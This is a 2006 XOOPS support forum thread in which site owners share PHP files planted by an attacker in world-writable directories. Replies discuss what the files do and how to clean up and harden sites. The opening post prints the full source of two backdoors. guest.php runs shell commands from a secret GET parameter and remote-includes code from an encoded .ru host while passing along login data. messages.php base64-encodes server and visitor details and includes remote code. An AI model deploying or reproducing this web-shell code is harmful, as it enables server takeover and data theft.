1
OldFriend
System Security.
  • 2006/8/25 8:05

  • OldFriend

  • Just popping in

  • Posts: 99

  • Since: 2005/10/28


I found the following php files uploaded to a directory on my site. They aren't part of XOOPS so I can only assume that a hacker has put them there.

Can anybody tell me what these files would have allowed the culprit to do?

The first one was called guest.php
<?php
error_reporting
(0);
if(isset(
$_POST["l"]) and isset($_POST["p"])){
    if(isset(
$_POST["input"])){$user_auth="&l="base64_encode($_POST["l"]) ."&p="base64_encode(md5($_POST["p"]));}
    else{
$user_auth="&l="$_POST["l"] ."&p="$_POST["p"];}
}else{
$user_auth="";}
if(!isset(
$_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(
base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u"ip2long(getenv(REMOTE_ADDR))) ."&url="base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth $log_flg))
{
    if(isset(
$_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if(
$_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>


The second was called messages.php
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

2
nekro
Re: System Security.
  • 2006/8/25 12:46

  • nekro

  • Quite a regular

  • Posts: 213

  • Since: 2005/11/9


Yes i think that was made by a hacker...

they include some files from sites with that URL

"http://bis.iframe.ru/master.php?r_addr="

"user9.mshtml.ru"

"user7.htmltags.ru"

i think that the hack is used to capture all your server information as i can see... delete that files!

LUCK!

3
OldFriend
Re: System Security.
  • 2006/8/25 13:03

  • OldFriend

  • Just popping in

  • Posts: 99

  • Since: 2005/10/28


OK. Thanks for that. What can the hacker do with "all my server information"?

Since I found these first 2 files, I have found a stack of similar files throughout my site.

It seems that EVERY directory in my XOOPS site that has permissions set to 777.

I have deleted as many as I can, but there are even some of these files that now say that I don't have permission to delete.... I have contacted my host to try to remedy that.

I suggest that you all have a look in your directories to see if you have some php files there that shouldn't be.

The 3 directories along with their subdirectories are:
cache
templates_c
uploads

I would also suggest that you protect these directories by placing a .htaccess file in each of these directories with
Deny from all

4
nekro
Re: System Security.
  • 2006/8/25 13:37

  • nekro

  • Quite a regular

  • Posts: 213

  • Since: 2005/11/9


today i will check my XOOPS in the office... looking for that kind of files...

the information could be used to exploit the server... i don t know how ( im not a hacker )... but i know that more information... more easy for them!...

5
jensclas
Re: System Security.

Hey Old freind - do you have protector module installed? Curious to know if this happened in spite of using protector.

6
RachelVirago
Re: System Security.

I'm also no expert but first thing that occurs is that if all files have been cmod'ed 777 surely the server has already been exploited?

Therefore what point is there to capturing further info in this way?

Doesnt this suggest it's an inside job?

Needless to say I'm checking my sites permisions NOW!
Being transgender is NOT a choice.

7
martyboy
Re: System Security.
  • 2006/8/26 10:56

  • martyboy

  • Quite a regular

  • Posts: 256

  • Since: 2004/5/25


Hi, I had a similar problem with these PHP files a while ago, i did some research on them and if I can remember correctly they are some kind of hijacking script to redirect to some russian search engine. The hackers probably used a php shell to upload the files into world writable directories, I had found the files in my xcgal albums directories which where writable.

Not sure what you can do about the 777 directories, i think XOOPS needs to have some directories writable for the modules and other features to work.
Michael Jackson = King Of Pop

Xoops = King Of CMS

8
davidl2
Re: System Security.
  • 2006/8/26 10:58

  • davidl2

  • XOOPS is my life!

  • Posts: 4843

  • Since: 2003/5/26


Don't forget the hack could be from another account, not yours.

9
jlm69
Re: System Security.
  • 2006/8/26 11:45

  • jlm69

  • Module Developer

  • Posts: 719

  • Since: 2002/7/19


I had this happen to me last week. There is more to it than that. There is also a .htaccess file, so turn on 'show hidden files'. the .htacces file looks like this

options - MultiViews
Error Document 404 //'affected folder'/'one of the below files'


All of the files had owner '99' and group '99'


commands.php
configs.php
create.php
date.php
download.php
finfo.php
guest.php
include.php
includes.php
layout.php
messages.php
options.php
package.php
properties.php
remote.php
system.php
tests.php
time.php



I have found a .htaccess file and a combination of two of the files listed above in almost every file that was chmod 777. Also It happened to every XOOPS site that was on the server (Only my XOOPS sites have folders chmod 777) I have about 10 XOOPS sites on that server. It also happened to every Version of XOOPS I have 2.0.13.2, 2.0.14, 2.3 alpha, and It even happened with the protector module installed.

I think it was a server problem not a XOOPS problem but since XOOPS has folders chmod 777 it was infected, my server has since switched to phpsuexec, so now I can't chmod 777 any folder



In one instance they actually wrote to a file I had in the tinycontent module


Look in EVERY module that has chmod 777 directories.

I found them in

Xoops root

cache
templates_c
uploads

Modules

xoopsgallery
tinycontent
myads
jobs
alumni

That is all I can think of right now.

With about 10 sites you can imagine how messed up my head got.


John

10
OldFriend
Re: System Security.
  • 2006/8/26 11:53

  • OldFriend

  • Just popping in

  • Posts: 99

  • Since: 2005/10/28


Quote:

jensclas wrote:
Hey Old freind - do you have protector module installed? Curious to know if this happened in spite of using protector.


Yes, I have protector installed.

Login

Username:
Password:

Lost Password? Register now!

Who's Online

68 user(s) are online (55 user(s) are browsing Support Forums)


Members: 0


Guests: 68


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits